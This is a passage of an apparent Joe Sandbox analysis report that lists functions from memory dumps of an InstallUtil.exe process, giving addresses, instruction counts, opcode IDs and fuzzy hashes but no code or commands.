                                                                      • Instruction ID: 95323a542556aafd47bffed4ecbd3785127c69c42d0561c70886d577f14fdac4
                                                                      • Opcode Fuzzy Hash: c829a23481367fbd19c3514e6c7ec0708f2a9105124237d305000db687863061
                                                                      • Instruction Fuzzy Hash: 36113431B01A128FD31A4A25D4A457F7BA6EFC431130844A8E847CB356CF28CC17CB80
                                                                      Function 022AA818 Relevance: .4, Instructions: 413COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a230655dfc632f62d91b68d13fe75f324afda36b8340cbc4b13f2aed127db992
                                                                      • Instruction ID: f27c1068cfe16d686ea4cab0faadec5d97084ba424dd62d40e6cc05addd96128
                                                                      • Opcode Fuzzy Hash: a230655dfc632f62d91b68d13fe75f324afda36b8340cbc4b13f2aed127db992
                                                                      • Instruction Fuzzy Hash: 1CF16C71A50215CFCB14CFACC898AADBBF6FF88314B1A8459E415AB365CB35EC85CB50
                                                                      Function 022A7438 Relevance: .2, Instructions: 201COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6b126ff1f1acdf837eb1f55341f06de92f25afe42229d9b285bed28b9e78893a
                                                                      • Instruction ID: ebb429c5da22769225d2e51ab2ab9982f96d3f75b071461483b7029f67800790
                                                                      • Opcode Fuzzy Hash: 6b126ff1f1acdf837eb1f55341f06de92f25afe42229d9b285bed28b9e78893a
                                                                      • Instruction Fuzzy Hash: D6711A347206068FCB19DF6CC8A4AADBBE6AF49704F1500A5E916CB7B5DB70DC41CB94
                                                                      Function 022ACEC7 Relevance: .2, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8efb254b3633a398f2e95b97cb97473f322febd7c10a0a92629a4093eedfd496
                                                                      • Instruction ID: 5160f0ccad96c86d74fe2bac52c467794b02ebedeeb8eb1530397278ecfe37f5
                                                                      • Opcode Fuzzy Hash: 8efb254b3633a398f2e95b97cb97473f322febd7c10a0a92629a4093eedfd496
                                                                      • Instruction Fuzzy Hash: 9851AE74CB9647CFD3182F30A9AC16EBBA5FB1F727742AD04B11E85065CBB0586ADE10
                                                                      Function 022ACED8 Relevance: .2, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 50e5e76c00348f31b93d9a5fd8d32eec0938ff106eb8beb71c7e998487a0a9d5
                                                                      • Instruction ID: d605d4fb686f65de15587cf9f14e30a0e291772385830e15c50a176672b16682
                                                                      • Opcode Fuzzy Hash: 50e5e76c00348f31b93d9a5fd8d32eec0938ff106eb8beb71c7e998487a0a9d5
                                                                      • Instruction Fuzzy Hash: CA519E74CB5647CFD3182F30A9AC16EBBA5FB1F7277426D00B11E85065CBB058669E60
                                                                      Function 022AE2D8 Relevance: .2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11dc30c766074b4bae1527f0d2787ce0a69e319d1ab1135eb73a0feef7e82223
                                                                      • Instruction ID: 7a85cf30eaf79ed315c5b72a10f38838f47b42a6db87c3f140435ef34d396d15
                                                                      • Opcode Fuzzy Hash: 11dc30c766074b4bae1527f0d2787ce0a69e319d1ab1135eb73a0feef7e82223
                                                                      • Instruction Fuzzy Hash: B7611534E01218DFDB15DFA4D954A9EBBB2FF88304F608529D805BB355DB359986CF40
                                                                      Function 022A38F9 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8249f61f8b12045b00026b094f0cfd190ae8f8b4d2e35ab66941fed02101b198
                                                                      • Instruction ID: 2c7130074f07adf6dd5cd5d3934bf0e49d1f8fac614d6c229363b1f7fca759de
                                                                      • Opcode Fuzzy Hash: 8249f61f8b12045b00026b094f0cfd190ae8f8b4d2e35ab66941fed02101b198
                                                                      • Instruction Fuzzy Hash: 13518275E11208CFCB48DFA9D59099DBBF2FF89314B209469E409AB328DB75A946CF40
                                                                      Function 022ACD10 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 455d5b2181d6c98018c536e38000f3c70c67b957db0fc100211c8c5e69d41802
                                                                      • Instruction ID: 8400fb91c084400a0f633df136f8099352ad699ddb7f54fc68210c177a74d537
                                                                      • Opcode Fuzzy Hash: 455d5b2181d6c98018c536e38000f3c70c67b957db0fc100211c8c5e69d41802
                                                                      • Instruction Fuzzy Hash: 2B518274E11208DFDB48DFAAD9849DDBBF2BF89310F20816AE419AB365DB309945CF50
                                                                      Function 022A3908 Relevance: .1, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 336395767941fcad2486b614de8f1374a7f538fae063c4a900727bfd310669fd
                                                                      • Instruction ID: 90da359b9543014fa753b903e1d87985ccfbe47124d6aa594eb857a8fe651b4a
                                                                      • Opcode Fuzzy Hash: 336395767941fcad2486b614de8f1374a7f538fae063c4a900727bfd310669fd
                                                                      • Instruction Fuzzy Hash: 17519375E11208CFCB48DFA9D59099DBBF2FF89310B209469E809AB324DB35A942CF40
                                                                      Function 022AF0E9 Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3300224f23756621e80780fe1a4c19b2cb31448a74172564a1e2eb455753ab0
                                                                      • Instruction ID: 524ff82d293ea98f47a370fb7171e56ce6cdca4366ebad66967e27b3f2368bcd
                                                                      • Opcode Fuzzy Hash: a3300224f23756621e80780fe1a4c19b2cb31448a74172564a1e2eb455753ab0
                                                                      • Instruction Fuzzy Hash: F551C074D12228CFCB64DFA4C994BEDBBB1BB89301F1054AAD409AB754D735AE85CF40
                                                                      Function 022A9A63 Relevance: .1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 246bf7ca436c0298e2e07bda8dfeaac529537fb766416bf37d1fa26b185be7e8
                                                                      • Instruction ID: 729c7443a15e2eb11a93ecd559c42d4e98d9b5f6e18b1d416fc121bd2685196b
                                                                      • Opcode Fuzzy Hash: 246bf7ca436c0298e2e07bda8dfeaac529537fb766416bf37d1fa26b185be7e8
                                                                      • Instruction Fuzzy Hash: 8141D031A14249DFCF11CFEAC854ADDBFB2EF49314F048556E8029B69AD334D995CB60
                                                                      Function 022AD7CE Relevance: .1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4eef0be8d06405cef64d2c19ce1f2dc7399d6057660ddc8dffb4b7ffbfd317f4
                                                                      • Instruction ID: 1c1eb5d20a0ec4380ca11ff70b3b4129b8dcf3d38371d2da712eed2ffdfe3241
                                                                      • Opcode Fuzzy Hash: 4eef0be8d06405cef64d2c19ce1f2dc7399d6057660ddc8dffb4b7ffbfd317f4
                                                                      • Instruction Fuzzy Hash: 2F415974D61208CFCB18DFE8E8A46EDBBF2FB49300F609519E419ABA48D7749842CF54
                                                                      Function 022AD76E Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ef313c798051e934df3d101b741d051b09527eeaeea0603b9848a9e99712ac6
                                                                      • Instruction ID: da35b10eb5cdb3b0de83bba16ad0a86c042b0860f1f19dd296b204943c078d06
                                                                      • Opcode Fuzzy Hash: 0ef313c798051e934df3d101b741d051b09527eeaeea0603b9848a9e99712ac6
                                                                      • Instruction Fuzzy Hash: 17411574D11208CFCB04DFE8E8A46EDBBF2FB49304F60A519E419A7A58D7749842CF54
                                                                      Function 022AD620 Relevance: .1, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73a56e076747babb9502ce1eeeab8cebb2e1035f3b77857171b3a0ec780395f7
                                                                      • Instruction ID: d6f6f810a2768d85aad22a90d407bf0b6259bdbcfbde0b1ce69c8a92ccbdd165
                                                                      • Opcode Fuzzy Hash: 73a56e076747babb9502ce1eeeab8cebb2e1035f3b77857171b3a0ec780395f7
                                                                      • Instruction Fuzzy Hash: 73412670D11208CBCB08DFAAD8546DEFBF2BB89300F14D529E414B7A58DB749841CF54
                                                                      Function 022AA809 Relevance: .1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2132c2ae1b6a61a4ed26d1856871dd2adb77de79897e6006b71435cbbcd370f2
                                                                      • Instruction ID: 9f359ee487fd14298ed55c7e73a9267dd6f335d653ee9c1037d53c96f2a6ef64
                                                                      • Opcode Fuzzy Hash: 2132c2ae1b6a61a4ed26d1856871dd2adb77de79897e6006b71435cbbcd370f2
                                                                      • Instruction Fuzzy Hash: 6531C170B4050A8FCB04CFACC8999AEBBB2FF88354B158159E455D73A9CB30AD06CB90
                                                                      Function 022A2060 Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16374e38bb1d4dfea632375ef66b525e17cc3b2248386ce1b175363385ca3519
                                                                      • Instruction ID: ae22165b1c30d7b64e00226f7fe115c8634e05bf60f95f197c9d1041b4bda464
                                                                      • Opcode Fuzzy Hash: 16374e38bb1d4dfea632375ef66b525e17cc3b2248386ce1b175363385ca3519
                                                                      • Instruction Fuzzy Hash: 1321E071A10106DFCF14DFB4C460AAE37A5EB99364B10C51DD84A9B288DB39EA46CBD2
                                                                      Function 0092D044 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4148984454.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_92d000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1fbcad6e871c47bba2e28791b4054319c099df4de1fa02845249a781934bc2da
                                                                      • Instruction ID: ddb120dd008318884724192671b3dd26bf0fadb42b668a372a2fffdde45be92e
                                                                      • Opcode Fuzzy Hash: 1fbcad6e871c47bba2e28791b4054319c099df4de1fa02845249a781934bc2da
                                                                      • Instruction Fuzzy Hash: A0212671544204DFDB14DF24E9C4B26BBA5FB84314F30C96DE8494B36AC73AD846CA61
                                                                      Function 022A39ED Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba225a44e4cffcf2fb6b397576065d045e98672c51b71743f6ea1e0536e57fc6
                                                                      • Instruction ID: d7bfdfd5d03acd3e137fc4ec9c1bd8c5c801b8aa78815e06359efc4a97431164
                                                                      • Opcode Fuzzy Hash: ba225a44e4cffcf2fb6b397576065d045e98672c51b71743f6ea1e0536e57fc6
                                                                      • Instruction Fuzzy Hash: CB317F78E11209CFCB48EFB8E5948ADBBB2FF49305B204469E819AB324D775AD45CF40
                                                                      Function 022AD60F Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d59aa3587749015a36b496c88990a9b83866ac25dd07fa971b5876a6e618567
                                                                      • Instruction ID: d86f5afa3767c40187b86882ea88a73a4b73d95eabff8541b6b1cc75a7ea1037
                                                                      • Opcode Fuzzy Hash: 7d59aa3587749015a36b496c88990a9b83866ac25dd07fa971b5876a6e618567
                                                                      • Instruction Fuzzy Hash: 8B117C71E502098FDB09CFAAD8586DEBBB2EBC8300F08D029D414BB699DB74550B8E54
                                                                      Function 022AE1F8 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b79ddf568e766ef896c39354f06d4813eb2097aa71380aec6d42d08ee0ded66
                                                                      • Instruction ID: 7f41a227dbb1d4abe344441d5c2cc2c2be48247b16440f5ec9ed0b1b7a2bd0ba
                                                                      • Opcode Fuzzy Hash: 1b79ddf568e766ef896c39354f06d4813eb2097aa71380aec6d42d08ee0ded66
                                                                      • Instruction Fuzzy Hash: 7C215E70A042099FDB55EFB8D98069EBFF1FB45300F01D5BAD014AB369EB705A4A9B81
                                                                      Function 022A1F61 Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 02caed286110130865e5c5ac26f01f68c27da9471f6fa976bc2057fe7c3339f7
                                                                      • Instruction ID: 85347151241a439d9d6663876653edaf37ce624347b0f37332e17b8460f7333e
                                                                      • Opcode Fuzzy Hash: 02caed286110130865e5c5ac26f01f68c27da9471f6fa976bc2057fe7c3339f7
                                                                      • Instruction Fuzzy Hash: A421EF74C1520A8FCB45EFA8D8554EEBFF0FF09300F10466AE809B7254EB305A55CBA1
                                                                      Function 022AE208 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 83a2683c5e7a6811dbac79b56b5e63486d25f1cb2aafe02b46254adc2aabae8c
                                                                      • Instruction ID: d5906a67939816e571ce5e7bff354d91ee890cde465927fa4fd396690170d0fe
                                                                      • Opcode Fuzzy Hash: 83a2683c5e7a6811dbac79b56b5e63486d25f1cb2aafe02b46254adc2aabae8c
                                                                      • Instruction Fuzzy Hash: 28114C70E001099FCB54EFB9D98079EBFF2FB44304F00D5AAD014AB329EB705A469B81
                                                                      Function 0092D03F Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4148984454.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_92d000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                      • Instruction ID: 7b3f72975bd9b13bc17e0fb34cbf33d825f1643b5851290a96dfaaac2626ef9a
                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                      • Instruction Fuzzy Hash: E611DD75544284CFCB15CF10E9C4B16BFA2FB84314F24C6AAD8494B666C33AD85ACF62
                                                                      Function 022A1F08 Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26a38d2e4c6af664393ed23f046fa0257441b28a6cfe13f03674a7069adee1c4
                                                                      • Instruction ID: 0c4bafc3e603e5d814d3f82c52d1927a55bbfce276b0aa7230f50ae7359f810b
                                                                      • Opcode Fuzzy Hash: 26a38d2e4c6af664393ed23f046fa0257441b28a6cfe13f03674a7069adee1c4
                                                                      • Instruction Fuzzy Hash: 1F213674D0464A8FCB11EFA8D8485EEBFF0BF4A314F1442AAE445B7264EB301A95CB91
                                                                      Function 022A5607 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 365da69258440f46f27ba4741f1c29fb328eee18d1ba6ccbf4da60139d320a19
                                                                      • Instruction ID: 5ed17b722d5aabd07355256b8d60aaa9e341c4ac4182fd63609f79ecefb9869a
                                                                      • Opcode Fuzzy Hash: 365da69258440f46f27ba4741f1c29fb328eee18d1ba6ccbf4da60139d320a19
                                                                      • Instruction Fuzzy Hash: 6E01B571B401156FCB158EA898147EF7BE7DBCC751F18806AF915D7644CA7189218790
                                                                      Function 022AD449 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9d43fab45db48cff07b509473a7236c5cefca47f54ce24015326baa68bcbec7c
                                                                      • Instruction ID: 96cb5e61ba5425d904f738481dac5df9d5f0580ec60d832b82a6d39b1d38dfda
                                                                      • Opcode Fuzzy Hash: 9d43fab45db48cff07b509473a7236c5cefca47f54ce24015326baa68bcbec7c
                                                                      • Instruction Fuzzy Hash: 66F0EC30E981178FD707DA556C285FD7770D785310F00613DD401DB5D6CBB0D20B9980
                                                                      Function 022ADF08 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce7da85168fb2f5558ce05228bc4ccce349c78256bbe05c9568dc1d821ba7dba
                                                                      • Instruction ID: b7b8a26daeb9b6dc7f6d55eb3219755456b3fe1fcd98438177a701ba44f2c233
                                                                      • Opcode Fuzzy Hash: ce7da85168fb2f5558ce05228bc4ccce349c78256bbe05c9568dc1d821ba7dba
                                                                      • Instruction Fuzzy Hash: D8F0E534AA801A8FDB06EE9DAC286FEB770E785300F005439D400EB8D2CBB4D20F99C5
                                                                      Function 022AD4B4 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47e34ce2254f4fe1769066a3a0745d5e5d568ea29c6132d877fbd30bc9d40cae
                                                                      • Instruction ID: 54fa94b1a545e17063a1be1f276d7f902b3b51222d3f5640d12c55efdfa14feb
                                                                      • Opcode Fuzzy Hash: 47e34ce2254f4fe1769066a3a0745d5e5d568ea29c6132d877fbd30bc9d40cae
                                                                      • Instruction Fuzzy Hash: FDE0DFA2C28140CBD3158BE668360B9BF30D9E735174460C7D0898BD39E664E206EB11
                                                                      Function 022A2010 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7841d3876282bfe2f45dd8aa6e506093f22cc42265d5d784f33270843d8ea15b
                                                                      • Instruction ID: f37cba310672d81350379d3cda0af54e7889b26da104102d7d187426a8b0f2d6
                                                                      • Opcode Fuzzy Hash: 7841d3876282bfe2f45dd8aa6e506093f22cc42265d5d784f33270843d8ea15b
                                                                      • Instruction Fuzzy Hash: 35E0D8319243965BC7129B7098590EEBF30EDD7314B2555AAD4D467041EB30151BC793
                                                                      Function 022A2020 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa5856f31a369e7df4552f5b28de5f9513d5737d0a60e277f1dc9ac94df8c183
                                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                      • Opcode Fuzzy Hash: aa5856f31a369e7df4552f5b28de5f9513d5737d0a60e277f1dc9ac94df8c183
                                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                      Function 022A8258 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                      • Instruction ID: 93beb2670146c2871071e29bb32dda5f4319703d6666a49a6b738f490e56d80d
                                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                      • Instruction Fuzzy Hash: C9C0123321C1286BA628108F7C40AB3AB8CC2C13B4A250137F95CA7600A8829C8041AA
                                                                      Function 022AA70D Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60f63393070efdcae70c76d11e070ec0ceb4c1855e72176b735c96398ae6e5a6
                                                                      • Instruction ID: 76701cea63357aca94e7f493ad391279c728385aa03c7731682db4c62de01552
                                                                      • Opcode Fuzzy Hash: 60f63393070efdcae70c76d11e070ec0ceb4c1855e72176b735c96398ae6e5a6
